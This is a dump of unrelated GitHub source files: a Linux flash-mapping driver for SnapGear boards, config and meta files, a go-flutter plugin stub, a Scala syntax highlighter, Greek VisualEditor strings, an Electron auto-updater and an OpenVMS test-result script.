#include <linux/reboot.h>
#include <linux/err.h>
#include <linux/kdev_t.h>
#include <linux/root_dev.h>
#include <asm/io.h>
/****************************************************************************/
#define INTEL_BUSWIDTH 1
#define AMD_WINDOW_MAXSIZE 0x00200000
#define AMD_BUSWIDTH 1
/*
* PAR masks and shifts, assuming 64K pages.
*/
#define SC520_PAR_ADDR_MASK 0x00003fff
#define SC520_PAR_ADDR_SHIFT 16
#define SC520_PAR_TO_ADDR(par) \
(((par)&SC520_PAR_ADDR_MASK) << SC520_PAR_ADDR_SHIFT)
#define SC520_PAR_SIZE_MASK 0x01ffc000
#define SC520_PAR_SIZE_SHIFT 2
#define SC520_PAR_TO_SIZE(par) \
((((par)&SC520_PAR_SIZE_MASK) << SC520_PAR_SIZE_SHIFT) + (64*1024))
#define SC520_PAR(cs, addr, size) \
((cs) | \
((((size)-(64*1024)) >> SC520_PAR_SIZE_SHIFT) & SC520_PAR_SIZE_MASK) | \
(((addr) >> SC520_PAR_ADDR_SHIFT) & SC520_PAR_ADDR_MASK))
#define SC520_PAR_BOOTCS 0x8a000000
#define SC520_PAR_ROMCS1 0xaa000000
#define SC520_PAR_ROMCS2 0xca000000 /* Cache disabled, 64K page */
static void *nettel_mmcrp = NULL;
#ifdef CONFIG_MTD_CFI_INTELEXT
static struct mtd_info *intel_mtd;
#endif
static struct mtd_info *amd_mtd;
/****************************************************************************/
/****************************************************************************/
#ifdef CONFIG_MTD_CFI_INTELEXT
static struct map_info nettel_intel_map = {
.name = "SnapGear Intel",
.size = 0,
.bankwidth = INTEL_BUSWIDTH,
};
static struct mtd_partition nettel_intel_partitions[] = {
{
.name = "SnapGear kernel",
.offset = 0,
.size = 0x000e0000
},
{
.name = "SnapGear filesystem",
.offset = 0x00100000,
},
{
.name = "SnapGear config",
.offset = 0x000e0000,
.size = 0x00020000
},
{
.name = "SnapGear Intel",
.offset = 0
},
{
.name = "SnapGear BIOS Config",
.offset = 0x007e0000,
.size = 0x00020000
},
{
.name = "SnapGear BIOS",
.offset = 0x007e0000,
.size = 0x00020000
},
};
#endif
static struct map_info nettel_amd_map = {
.name = "SnapGear AMD",
.size = AMD_WINDOW_MAXSIZE,
.bankwidth = AMD_BUSWIDTH,
};
static struct mtd_partition nettel_amd_partitions[] = {
{
.name = "SnapGear BIOS config",
.offset = 0x000e0000,
.size = 0x00010000
},
{
.name = "SnapGear BIOS",
.offset = 0x000f0000,
.size = 0x00010000
},
{
.name = "SnapGear AMD",
.offset = 0
},
{
.name = "SnapGear high BIOS",
.offset = 0x001f0000,
.size = 0x00010000
}
};
#define NUM_AMD_PARTITIONS ARRAY_SIZE(nettel_amd_partitions)
/****************************************************************************/
#ifdef CONFIG_MTD_CFI_INTELEXT
/*
* Set the Intel flash back to read mode since some old boot
* loaders don't.
*/
static int nettel_reboot_notifier(struct notifier_block *nb, unsigned long val, void *v)
{
struct cfi_private *cfi = nettel_intel_map.fldrv_priv;
unsigned long b;
/* Make sure all FLASH chips are put back into read mode */
for (b = 0; (b < nettel_intel_partitions[3].size); b += 0x100000) {
cfi_send_gen_cmd(0xff, 0x55, b, &nettel_intel_map, cfi,
cfi->device_type, NULL);
}
return(NOTIFY_OK);
}
static struct notifier_block nettel_notifier_block = {
nettel_reboot_notifier, NULL, 0
};
#endif
/****************************************************************************/
static int __init nettel_init(void)
{
volatile unsigned long *amdpar;
unsigned long amdaddr, maxsize;
int num_amd_partitions=0;
#ifdef CONFIG_MTD_CFI_INTELEXT
volatile unsigned long *intel0par, *intel1par;
unsigned long orig_bootcspar, orig_romcs1par;
unsigned long intel0addr, intel0size;
unsigned long intel1addr, intel1size;
int intelboot, intel0cs, intel1cs;
int num_intel_partitions;
#endif
int rc = 0;
nettel_mmcrp = (void *) ioremap_nocache(0xfffef000, 4096);
if (nettel_mmcrp == NULL) {
printk("SNAPGEAR: failed to disable MMCR cache??\n");
return(-EIO);
}
/* Set CPU clock to be 33.000MHz */
*((unsigned char *) (nettel_mmcrp + 0xc64)) = 0x01;
amdpar = (volatile unsigned long *) (nettel_mmcrp + 0xc4);
#ifdef CONFIG_MTD_CFI_INTELEXT
intelboot = 0;
intel0cs = SC520_PAR_ROMCS1;
intel0par = (volatile unsigned long *) (nettel_mmcrp + 0xc0);
intel1cs = SC520_PAR_ROMCS2;
intel1par = (volatile unsigned long *) (nettel_mmcrp + 0xbc);
/*
* Save the CS settings then ensure ROMCS1 and ROMCS2 are off,
* otherwise they might clash with where we try to map BOOTCS.
*/
orig_bootcspar = *amdpar;
orig_romcs1par = *intel0par;
*intel0par = 0;
*intel1par = 0;
#endif
/*
* The first thing to do is determine if we have a separate
* boot FLASH device. Typically this is a small (1 to 2MB)
* AMD FLASH part. It seems that device size is about the
* only way to tell if this is the case...
*/
amdaddr = 0x20000000;
maxsize = AMD_WINDOW_MAXSIZE;
*amdpar = SC520_PAR(SC520_PAR_BOOTCS, amdaddr, maxsize);
__asm__ ("wbinvd");
nettel_amd_map.phys = amdaddr;
nettel_amd_map.virt = ioremap_nocache(amdaddr, maxsize);
if (!nettel_amd_map.virt) {
printk("SNAPGEAR: failed to ioremap() BOOTCS\n");
iounmap(nettel_mmcrp);
return(-EIO);
}
simple_map_init(&nettel_amd_map);
if ((amd_mtd = do_map_probe("jedec_probe", &nettel_amd_map))) {
printk(KERN_NOTICE "SNAPGEAR: AMD flash device size = %dK\n",
(int)(amd_mtd->size>>10));
amd_mtd->owner = THIS_MODULE;
/* The high BIOS partition is only present for 2MB units */
num_amd_partitions = NUM_AMD_PARTITIONS;
if (amd_mtd->size < AMD_WINDOW_MAXSIZE)
num_amd_partitions--;
/* Don't add the partition until after the primary INTEL's */
#ifdef CONFIG_MTD_CFI_INTELEXT
/*
* Map the Intel flash into memory after the AMD
* It has to start on a multiple of maxsize.
*/
maxsize = SC520_PAR_TO_SIZE(orig_romcs1par);
if (maxsize < (32 * 1024 * 1024))
maxsize = (32 * 1024 * 1024);
intel0addr = amdaddr + maxsize;
#endif
} else {
#ifdef CONFIG_MTD_CFI_INTELEXT
/* INTEL boot FLASH */
intelboot++;
if (!orig_romcs1par) {
intel0cs = SC520_PAR_BOOTCS;
intel0par = (volatile unsigned long *)
(nettel_mmcrp + 0xc4);
intel1cs = SC520_PAR_ROMCS1;
intel1par = (volatile unsigned long *)
(nettel_mmcrp + 0xc0);
intel0addr = SC520_PAR_TO_ADDR(orig_bootcspar);
maxsize = SC520_PAR_TO_SIZE(orig_bootcspar);
} else {
/* Kernel base is on ROMCS1, not BOOTCS */
intel0cs = SC520_PAR_ROMCS1;
intel0par = (volatile unsigned long *)
(nettel_mmcrp + 0xc0);
intel1cs = SC520_PAR_BOOTCS;
intel1par = (volatile unsigned long *)
(nettel_mmcrp + 0xc4);
intel0addr = SC520_PAR_TO_ADDR(orig_romcs1par);
maxsize = SC520_PAR_TO_SIZE(orig_romcs1par);
}
/* Destroy useless AMD MTD mapping */
amd_mtd = NULL;
iounmap(nettel_amd_map.virt);
nettel_amd_map.virt = NULL;
#else
/* Only AMD flash supported */
rc = -ENXIO;
goto out_unmap2;
#endif
}
#ifdef CONFIG_MTD_CFI_INTELEXT
/*
* We have determined the INTEL FLASH configuration, so lets
* go ahead and probe for them now.
*/
/* Set PAR to the maximum size */
if (maxsize < (32 * 1024 * 1024))
maxsize = (32 * 1024 * 1024);
*intel0par = SC520_PAR(intel0cs, intel0addr, maxsize);
/* Turn other PAR off so the first probe doesn't find it */
*intel1par = 0;
/* Probe for the size of the first Intel flash */
nettel_intel_map.size = maxsize;
nettel_intel_map.phys = intel0addr;
nettel_intel_map.virt = ioremap_nocache(intel0addr, maxsize);
if (!nettel_intel_map.virt) {
printk("SNAPGEAR: failed to ioremap() ROMCS1\n");
rc = -EIO;
goto out_unmap2;
}
simple_map_init(&nettel_intel_map);
intel_mtd = do_map_probe("cfi_probe", &nettel_intel_map);
if (!intel_mtd) {
rc = -ENXIO;
goto out_unmap1;
}
/* Set PAR to the detected size */
intel0size = intel_mtd->size;
*intel0par = SC520_PAR(intel0cs, intel0addr, intel0size);
/*
* Map second Intel FLASH right after first. Set its size to the
* same maxsize used for the first Intel FLASH.
*/
intel1addr = intel0addr + intel0size;
*intel1par = SC520_PAR(intel1cs, intel1addr, maxsize);
__asm__ ("wbinvd");
maxsize += intel0size;
/* Delete the old map and probe again to do both chips */
map_destroy(intel_mtd);
intel_mtd = NULL;
iounmap(nettel_intel_map.virt);
nettel_intel_map.size = maxsize;
nettel_intel_map.virt = ioremap_nocache(intel0addr, maxsize);
if (!nettel_intel_map.virt) {
printk("SNAPGEAR: failed to ioremap() ROMCS1/2\n");
rc = -EIO;
goto out_unmap2;
}
intel_mtd = do_map_probe("cfi_probe", &nettel_intel_map);
if (! intel_mtd) {
rc = -ENXIO;
goto out_unmap1;
}
intel1size = intel_mtd->size - intel0size;
if (intel1size > 0) {
*intel1par = SC520_PAR(intel1cs, intel1addr, intel1size);
__asm__ ("wbinvd");
} else {
*intel1par = 0;
}
printk(KERN_NOTICE "SNAPGEAR: Intel flash device size = %lldKiB\n",
(unsigned long long)(intel_mtd->size >> 10));
intel_mtd->owner = THIS_MODULE;
num_intel_partitions = ARRAY_SIZE(nettel_intel_partitions);
if (intelboot) {
/*
* Adjust offset and size of last boot partition.
* Must allow for BIOS region at end of FLASH.
*/
nettel_intel_partitions[1].size = (intel0size + intel1size) -
(1024*1024 + intel_mtd->erasesize);
nettel_intel_partitions[3].size = intel0size + intel1size;
nettel_intel_partitions[4].offset =
(intel0size + intel1size) - intel_mtd->erasesize;
nettel_intel_partitions[4].size = intel_mtd->erasesize;
nettel_intel_partitions[5].offset =
nettel_intel_partitions[4].offset;
nettel_intel_partitions[5].size =
nettel_intel_partitions[4].size;
} else {
/* No BIOS regions when AMD boot */
num_intel_partitions -= 2;
}
rc = mtd_device_register(intel_mtd, nettel_intel_partitions,
num_intel_partitions);
#endif
if (amd_mtd) {
rc = mtd_device_register(amd_mtd, nettel_amd_partitions,
num_amd_partitions);
}
#ifdef CONFIG_MTD_CFI_INTELEXT
register_reboot_notifier(&nettel_notifier_block);
#endif
return(rc);
#ifdef CONFIG_MTD_CFI_INTELEXT
out_unmap1:
iounmap(nettel_intel_map.virt);
#endif
out_unmap2:
iounmap(nettel_mmcrp);
iounmap(nettel_amd_map.virt);
return(rc);
}
/****************************************************************************/
static void __exit nettel_cleanup(void)
{
#ifdef CONFIG_MTD_CFI_INTELEXT
unregister_reboot_notifier(&nettel_notifier_block);
#endif
if (amd_mtd) {
mtd_device_unregister(amd_mtd);
map_destroy(amd_mtd);
}
if (nettel_mmcrp) {
iounmap(nettel_mmcrp);
nettel_mmcrp = NULL;
}
if (nettel_amd_map.virt) {
iounmap(nettel_amd_map.virt);
nettel_amd_map.virt = NULL;
}
#ifdef CONFIG_MTD_CFI_INTELEXT
if (intel_mtd) {
mtd_device_unregister(intel_mtd);
map_destroy(intel_mtd);
}
if (nettel_intel_map.virt) {
iounmap(nettel_intel_map.virt);
nettel_intel_map.virt = NULL;
}
#endif
}
/****************************************************************************/
module_init(nettel_init);
module_exit(nettel_cleanup);
MODULE_LICENSE("GPL");
MODULE_AUTHOR("Greg Ungerer <[email protected]>");
MODULE_DESCRIPTION("SnapGear/SecureEdge FLASH support");
/****************************************************************************/
| {
"pile_set_name": "Github"
} |
version https://git-lfs.github.com/spec/v1
oid sha256:d1ecb296a6bbaf5d28e97428198041562820e9e33675dba7afbea73545dfa06d
size 7885
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<startup>
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5"/>
</startup>
</configuration>
| {
"pile_set_name": "Github"
} |
fileFormatVersion: 2
guid: e89bad6ca44e28f41abe9217d6458fd1
MonoImporter:
externalObjects: {}
serializedVersion: 2
defaultReferences: []
executionOrder: 0
icon: {instanceID: 0}
userData:
assetBundleName:
assetBundleVariant:
| {
"pile_set_name": "Github"
} |
package main
// DO NOT EDIT, this file is generated by hover at compile-time for the testplu2 plugin.
import (
flutter "github.com/go-flutter-desktop/go-flutter"
file_picker "github.com/miguelpruivo/plugins_flutter_file_picker/go"
)
func init() {
// Only the init function can me tweaked by plugin maker.
options = append(options, flutter.AddPlugin(&file_picker.FilePickerPlugin{}))
}
| {
"pile_set_name": "Github"
} |
// Copyright (C) 2010 Google Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
/**
* @fileoverview
* Registers a language handler for Scala.
*
* Derived from http://lampsvn.epfl.ch/svn-repos/scala/scala-documentation/trunk/src/reference/SyntaxSummary.tex
*
* @author [email protected]
*/
PR['registerLangHandler'](
PR['createSimpleLexer'](
[
// Whitespace
[PR['PR_PLAIN'], /^[\t\n\r \xA0]+/, null, '\t\n\r \xA0'],
// A double or single quoted string
// or a triple double-quoted multi-line string.
[PR['PR_STRING'],
/^(?:"(?:(?:""(?:""?(?!")|[^\\"]|\\.)*"{0,3})|(?:[^"\r\n\\]|\\.)*"?))/,
null, '"'],
[PR['PR_LITERAL'], /^`(?:[^\r\n\\`]|\\.)*`?/, null, '`'],
[PR['PR_PUNCTUATION'], /^[!#%&()*+,\-:;<=>?@\[\\\]^{|}~]+/, null,
'!#%&()*+,-:;<=>?@[\\]^{|}~']
],
[
// A symbol literal is a single quote followed by an identifier with no
// single quote following
// A character literal has single quotes on either side
[PR['PR_STRING'], /^'(?:[^\r\n\\']|\\(?:'|[^\r\n']+))'/],
[PR['PR_LITERAL'], /^'[a-zA-Z_$][\w$]*(?!['$\w])/],
[PR['PR_KEYWORD'], /^(?:abstract|case|catch|class|def|do|else|extends|final|finally|for|forSome|if|implicit|import|lazy|match|new|object|override|package|private|protected|requires|return|sealed|super|throw|trait|try|type|val|var|while|with|yield)\b/],
[PR['PR_LITERAL'], /^(?:true|false|null|this)\b/],
[PR['PR_LITERAL'], /^(?:(?:0(?:[0-7]+|X[0-9A-F]+))L?|(?:(?:0|[1-9][0-9]*)(?:(?:\.[0-9]+)?(?:E[+\-]?[0-9]+)?F?|L?))|\\.[0-9]+(?:E[+\-]?[0-9]+)?F?)/i],
// Treat upper camel case identifiers as types.
[PR['PR_TYPE'], /^[$_]*[A-Z][_$A-Z0-9]*[a-z][\w$]*/],
[PR['PR_PLAIN'], /^[$a-zA-Z_][\w$]*/],
[PR['PR_COMMENT'], /^\/(?:\/.*|\*(?:\/|\**[^*/])*(?:\*+\/?)?)/],
[PR['PR_PUNCTUATION'], /^(?:\.+|\/)/]
]),
['scala']);
| {
"pile_set_name": "Github"
} |
{
"@metadata": {
"authors": [
"Astralnet",
"Dipa1965",
"Evropi",
"FocalPoint",
"GR",
"Geraki",
"Giorgos456",
"Glavkos",
"Nikosgranturismogt",
"Nikosguard",
"Tifa93"
]
},
"visualeditor": "VisualEditor",
"visualeditor-aliencontextitem-title": "Αντικείμενο",
"visualeditor-aliennode-tooltip": "Συγγνώμη, προς το παρόν η επεξεργασία αυτού του στοιχείου μπορεί να γίνει μόνο με τον επεξεργαστή κώδικα.",
"visualeditor-align-desc-center": "κέντρο",
"visualeditor-align-desc-default": "προεπιλογή",
"visualeditor-align-desc-left": "αριστερά",
"visualeditor-align-desc-none": "καμία",
"visualeditor-align-desc-right": "δεξιά",
"visualeditor-align-widget-center": "Κέντρο",
"visualeditor-align-widget-default": "Προεπιλογή",
"visualeditor-align-widget-left": "Αριστερά",
"visualeditor-align-widget-right": "Δεξιά",
"visualeditor-alignablecontextitem-title": "Ευθυγράμμιση",
"visualeditor-annotationbutton-big-tooltip": "Μεγάλα",
"visualeditor-annotationbutton-bold-tooltip": "Έντονα",
"visualeditor-annotationbutton-code-tooltip": "Κώδικας υπολογιστή",
"visualeditor-annotationbutton-italic-tooltip": "Πλάγια",
"visualeditor-annotationbutton-language-tooltip": "Γλώσσα",
"visualeditor-annotationbutton-link-tooltip": "Σύνδεσμος",
"visualeditor-annotationbutton-small-tooltip": "Μικρά",
"visualeditor-annotationbutton-strikethrough-tooltip": "Επιλογή προς διαγραφή",
"visualeditor-annotationbutton-subscript-tooltip": "Δείκτης",
"visualeditor-annotationbutton-superscript-tooltip": "Εκθέτης",
"visualeditor-annotationbutton-underline-tooltip": "Υπογράμμιση",
"visualeditor-changedesc-align": "Η στοίχιση άλλαξε από $1 σε $2",
"visualeditor-changedesc-changed": "Το $1 άλλαξε από $2 σε $3",
"visualeditor-changedesc-comment": "Το σχόλιο άλλαξε από $1 σε $2",
"visualeditor-changedesc-image-size": "Το μέγεθος άλλαξε από $1 σε $2",
"visualeditor-changedesc-language": "Η γλώσσα άλλαξε από $1 σε $2",
"visualeditor-changedesc-link-href": "Ο στόχος συνδέσμου άλλαξε από $1 σε $2",
"visualeditor-changedesc-no-key": "$1 άλλαξε σε $2",
"visualeditor-changedesc-set": "$1 ορίστηκε σε $2",
"visualeditor-changedesc-unknown": "$1 άλλαξε",
"visualeditor-changedir": "Αλλαγή κατεύθυνσης",
"visualeditor-changedir-tool-ltr": "Εμφάνιση ως αριστερά προς δεξιά",
"visualeditor-changedir-tool-rtl": "Εμφάνιση ως δεξιά προς αριστερά",
"visualeditor-clearbutton-tooltip": "Αφαίρεση",
"visualeditor-clipboard-copy": "Αντιγραφή",
"visualeditor-clipboard-cut": "Αποκοπή",
"visualeditor-clipboard-paste": "Επικόλληση",
"visualeditor-clipboard-paste-special": "Επικόλληση ως απλό κείμενο",
"visualeditor-command-dialog-cancel": "Κλείσιμο / απόρριψη αλλαγής",
"visualeditor-command-dialog-confirm": "Επιβεβαίωση αλλαγής",
"visualeditor-commentinspector-edit": "Επεξεργασία σχολίου",
"visualeditor-commentinspector-title": "Σχόλιο",
"visualeditor-commentinspector-tooltip": "Σχόλιο",
"visualeditor-content-select-all": "Επιλογή όλων",
"visualeditor-contextitemwidget-label-close": "Κλείσιμο",
"visualeditor-contextitemwidget-label-remove": "Διαγραφή",
"visualeditor-contextitemwidget-label-secondary": "Επεξεργασία",
"visualeditor-debugbar-close": "Κλείσιμο",
"visualeditor-debugbar-logrange": "Επιλεγμένο μητρώο",
"visualeditor-debugbar-showmodel": "Εμφάνιση μοντέλου",
"visualeditor-debugbar-showtransactions": "Εμφάνιση συναλλαγών",
"visualeditor-debugbar-updatemodel": "Ενημέρωση σε αλλαγές",
"visualeditor-dialog-action-apply": "Εφαρμογή αλλαγών",
"visualeditor-dialog-action-cancel": "Ακύρωση",
"visualeditor-dialog-action-done": "Έγινε",
"visualeditor-dialog-action-goback": "Επιστροφή",
"visualeditor-dialog-action-insert": "Εισαγωγή",
"visualeditor-dialog-command-help-title": "Συντομεύσεις πληκτρολογίου",
"visualeditor-dialog-error": "Κάτι πήγε στραβά...",
"visualeditor-dialog-error-dismiss": "Πήγαινε πίσω",
"visualeditor-dialog-language-auto-direction": "Auto",
"visualeditor-dialog-language-search-title": "Επιλογή γλώσσας",
"visualeditor-dialog-table-caption": "Λεζάντα",
"visualeditor-dialog-table-title": "Ιδιότητες πίνακα",
"visualeditor-diff-no-changes": "Δεν υπάρχουν αλλαγές",
"visualeditor-find-and-replace-done": "Έγινε",
"visualeditor-find-and-replace-find-text": "Εύρεση",
"visualeditor-find-and-replace-invalid-regex": "Μη έγκυρη κανονική έκφραση",
"visualeditor-find-and-replace-match-case": "Ταίριασμα πεζών-κεφαλαίων",
"visualeditor-find-and-replace-next-button": "Εύρεση επομένου",
"visualeditor-find-and-replace-previous-button": "Εύρεση προηγουμένου",
"visualeditor-find-and-replace-regular-expression": "Regular expression",
"visualeditor-find-and-replace-replace-all-button": "Αντικατάσταση όλων",
"visualeditor-find-and-replace-replace-button": "Αντικατάσταση",
"visualeditor-find-and-replace-replace-text": "Αντικατάσταση",
"visualeditor-find-and-replace-results": "$1 από $2",
"visualeditor-find-and-replace-title": "Εύρεση και αντικατάσταση",
"visualeditor-find-and-replace-word": "Ολόκληρη τη λέξη",
"visualeditor-formatdropdown-format-blockquote": "Παράθεμα",
"visualeditor-formatdropdown-format-heading-label": "Επικεφαλίδα (1-6)",
"visualeditor-formatdropdown-format-heading1": "Επικεφαλίδα",
"visualeditor-formatdropdown-format-heading2": "Επίπεδο 2",
"visualeditor-formatdropdown-format-heading3": "Επίπεδο 3",
"visualeditor-formatdropdown-format-heading4": "Επίπεδο 4",
"visualeditor-formatdropdown-format-heading5": "Επίπεδο 5",
"visualeditor-formatdropdown-format-heading6": "Επίπεδο 6",
"visualeditor-formatdropdown-format-paragraph": "Παράγραφος",
"visualeditor-formatdropdown-format-preformatted": "Προμορφοποιημένο",
"visualeditor-formatdropdown-title": "Αλλαγή μορφοποίησης",
"visualeditor-help-tool": "Βοήθεια",
"visualeditor-historybutton-redo-tooltip": "Ακύρωση αναίρεσης",
"visualeditor-historybutton-undo-tooltip": "Αναίρεση",
"visualeditor-indentationbutton-indent-tooltip": "Αύξηση εσοχής",
"visualeditor-indentationbutton-outdent-tooltip": "Μείωση εσοχής",
"visualeditor-inspector-close-tooltip": "Κλείσιμο",
"visualeditor-inspector-remove-tooltip": "Αφαίρεση",
"visualeditor-key-alt": "Alt",
"visualeditor-key-backspace": "Backspace",
"visualeditor-key-ctrl": "Ctrl",
"visualeditor-key-delete": "Διαγραφή",
"visualeditor-key-down": "Κάτω",
"visualeditor-key-end": "Τέλος",
"visualeditor-key-enter": "Enter",
"visualeditor-key-escape": "Escape",
"visualeditor-key-home": "Αρχική",
"visualeditor-key-insert": "Εισαγωγή",
"visualeditor-key-left": "Αριστερά",
"visualeditor-key-meta": "Meta",
"visualeditor-key-page-down": "Σελίδα κάτω",
"visualeditor-key-page-up": "Σελίδα πάνω",
"visualeditor-key-right": "Δεξιά",
"visualeditor-key-shift": "Shift",
"visualeditor-key-space": "Κενό",
"visualeditor-key-tab": "Tab",
"visualeditor-key-up": "Πάνω",
"visualeditor-language-search-input-placeholder": "Αναζήτηση με το όνομα ή τον κωδικό γλώσσας",
"visualeditor-languagecontext-remove": "Αφαίρεση γλώσσας",
"visualeditor-languageinspector-title": "Γλώσσα",
"visualeditor-languageinspector-widget-changelang": "Εύρεση γλώσσας",
"visualeditor-languageinspector-widget-label-direction": "Κατεύθυνση",
"visualeditor-languageinspector-widget-label-langcode": "Κωδικός γλώσσας",
"visualeditor-languageinspector-widget-label-language": "Γλώσσα",
"visualeditor-linkcontext-label-change": "Αλλαγή ετικέτας",
"visualeditor-linkcontext-label-fallback": "Χωρίς προεπισκόπηση",
"visualeditor-linkcontext-label-label": "Ετικέτα",
"visualeditor-linkcontext-remove": "Αφαίρεση συνδέσμου",
"visualeditor-linkinspector-title": "Σύνδεσμος",
"visualeditor-listbutton-bullet-tooltip": "Λίστα με κουκκίδες",
"visualeditor-listbutton-number-tooltip": "Αριθμημένος κατάλογος",
"visualeditor-mediasizewidget-label-defaulterror": "Οι τιμές μεγέθους δεν είναι έγκυρες.",
"visualeditor-mediasizewidget-label-scale": "Κλίμακα",
"visualeditor-mediasizewidget-label-scale-percent": "% του μεγέθους μικρογραφίας",
"visualeditor-mediasizewidget-sizeoptions-custom": "Προσαρμογή",
"visualeditor-mediasizewidget-sizeoptions-default": "Προεπιλογή",
"visualeditor-mediasizewidget-sizeoptions-scale": "Κλίμακα",
"visualeditor-pagemenu-tooltip": "Επιλογές σελίδας",
"visualeditor-rebase-client-author-name": "Όνομα",
"visualeditor-rebase-client-connecting": "Σύνδεση σε εξέλιξη...",
"visualeditor-rebase-client-document-name": "Όνομα εγγράφου (προαιρετικό)",
"visualeditor-rebase-client-document-create-edit": "Δημιουργία/επεξεργασία",
"visualeditor-shortcuts-clipboard": "Πρόχειρο",
"visualeditor-shortcuts-dialog": "Έλεγχοι παραθύρων",
"visualeditor-shortcuts-formatting": "Μορφοποίηση παραγράφου",
"visualeditor-shortcuts-history": "Ιστορικό",
"visualeditor-shortcuts-insert": "Εισαγωγή",
"visualeditor-shortcuts-other": "Άλλες",
"visualeditor-shortcuts-sequence-notice": "Τύπος",
"visualeditor-shortcuts-text-style": "Styling κειμένου",
"visualeditor-slug-insert": "Εισαγωγή παραγράφου",
"visualeditor-specialcharacter-button-tooltip": "Ειδικοί χαρακτήρες",
"visualeditor-specialcharacterinspector-title": "Ειδικός χαρακτήρας",
"visualeditor-table-caption": "Λεζάντα",
"visualeditor-table-contextitem-properties": "Ιδιότητες",
"visualeditor-table-delete-col": "Διαγραφή {{PLURAL:$1|στήλης|στηλών}}",
"visualeditor-table-delete-row": "Διαγραφή {{PLURAL:$1|γραμμής|γραμμών}}",
"visualeditor-table-format-data": "Κελί περιεχομένου",
"visualeditor-table-format-header": "Κελί κεφαλίδας",
"visualeditor-table-insert-col-after": "Εισαγωγή μετά",
"visualeditor-table-insert-col-before": "Εισαγωγή πριν",
"visualeditor-table-insert-row-after": "Εισαγωγή παρακάτω",
"visualeditor-table-insert-row-before": "Εισαγωγή παραπάνω",
"visualeditor-table-insert-table": "Πίνακας",
"visualeditor-table-merge-cells": "Συγχώνευση κελιών",
"visualeditor-table-merge-cells-merge": "Συγχώνευση",
"visualeditor-table-merge-cells-unmerge": "Αναίρεση συγχώνευσης",
"visualeditor-table-move-col-after": "Μετακίνηση μετά",
"visualeditor-table-move-col-before": "Μετακίνηση πριν",
"visualeditor-table-move-row-after": "Μετακίνηση κάτω",
"visualeditor-table-move-row-before": "Μετακίνηση πάνω",
"visualeditor-table-sum": "Σύνολο: $1, Μέσος όρος: $2",
"visualeditor-tablecell-contextitem": "Κελί πίνακα",
"visualeditor-tablecell-tooltip": "Κάντε διπλό κλικ για επεξεργασία κελιού",
"visualeditor-toolbar-format-tooltip": "Μορφή παραγράφου",
"visualeditor-toolbar-history": "Ιστορικό",
"visualeditor-toolbar-insert": "Εισαγωγή",
"visualeditor-toolbar-paragraph-format": "Μορφοποίηση",
"visualeditor-toolbar-structure": "Δομή",
"visualeditor-toolbar-style-tooltip": "Στυλ κειμένου",
"visualeditor-toolbar-table": "Πίνακας",
"visualeditor-toolbar-text-style": "Styling"
}
| {
"pile_set_name": "Github"
} |
import { autoUpdater } from 'electron-updater';
import { GithubOptions } from 'builder-util-runtime';
export class AutoUpdater {
constructor(logger: any) {
this.init(logger);
}
init(sendStatusToWindow: any) {
autoUpdater.on('checking-for-update', () => {
console.log('Checking for update...');
});
autoUpdater.on('update-available', info => {
console.log('update available');
sendStatusToWindow('update-available', `Version: ${info.version}; ${info.releaseName}`);
});
autoUpdater.on('update-not-available', info => {
console.log('update not available');
});
autoUpdater.on('error', err => {
sendStatusToWindow('error', 'Error in auto-updater. ' + err);
sendStatusToWindow('error', err);
});
autoUpdater.on('download-progress', progressObj => {
let log_message = 'Download speed: ' + progressObj.bytesPerSecond;
log_message = log_message + ' - Downloaded ' + progressObj.percent + '%';
log_message =
log_message + ' (' + progressObj.transferred + '/' + progressObj.total + ')';
console.log(log_message);
sendStatusToWindow('download-progress', {
percent: progressObj.percent,
bytesPerSecond: progressObj.bytesPerSecond
});
});
autoUpdater.on('update-downloaded', info => {
console.log(info);
sendStatusToWindow('update-downloaded', 'Update downloaded');
});
}
checkUpdate() {
const data = {
provider: 'github',
owner: 'zxch3n',
repo: 'PomodoroLogger'
} as GithubOptions;
autoUpdater.setFeedURL(data);
autoUpdater.autoDownload = false;
autoUpdater.checkForUpdates();
}
download() {
autoUpdater.autoInstallOnAppQuit = true;
autoUpdater.downloadUpdate();
}
}
| {
"pile_set_name": "Github"
} |
$!
$! Analyze bntest output file.
$!
$! Exit status = 1 (success) if all tests passed,
$! 0 (warning) if any test failed.
$!
$! 2010-04-05 SMS. New. Based (loosely) on perl code in bntest-vms.sh.
$!
$! Expect data like:
$! test test_name1
$! 0
$! [...]
$! test test_name2
$! 0
$! [...]
$! [...]
$!
$! Some tests have no following "0" lines.
$!
$ result_file_name = f$edit( p1, "TRIM")
$ if (result_file_name .eqs. "")
$ then
$ result_file_name = "bntest-vms.out"
$ endif
$!
$ fail = 0
$ passed = 0
$ tests = 0
$!
$ on control_c then goto tidy
$ on error then goto tidy
$!
$ open /read result_file 'result_file_name'
$!
$ read_loop:
$ read /end = read_loop_end /error = tidy result_file line
$ t1 = f$element( 0, " ", line)
$ if (t1 .eqs. "test")
$ then
$ passed = passed+ 1
$ tests = tests+ 1
$ fail = 1
$ t2 = f$extract( 5, 1000, line)
$ write sys$output "verify ''t2'"
$ else
$ if (t1 .nes. "0")
$ then
$ write sys$output "Failed! bc: ''line'"
$ passed = passed- fail
$ fail = 0
$ endif
$ endif
$ goto read_loop
$ read_loop_end:
$ write sys$output "''passed'/''tests' tests passed"
$!
$ tidy:
$ if f$trnlnm( "result_file", "LNM$PROCESS_TABLE", , "SUPERVISOR", , "CONFINE")
$ then
$ close result_file
$ endif
$!
$ if ((tests .gt. 0) .and. (tests .eq. passed))
$ then
$ exit 1
$ else
$ exit 0
$ endif
$!
| {
"pile_set_name": "Github"
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.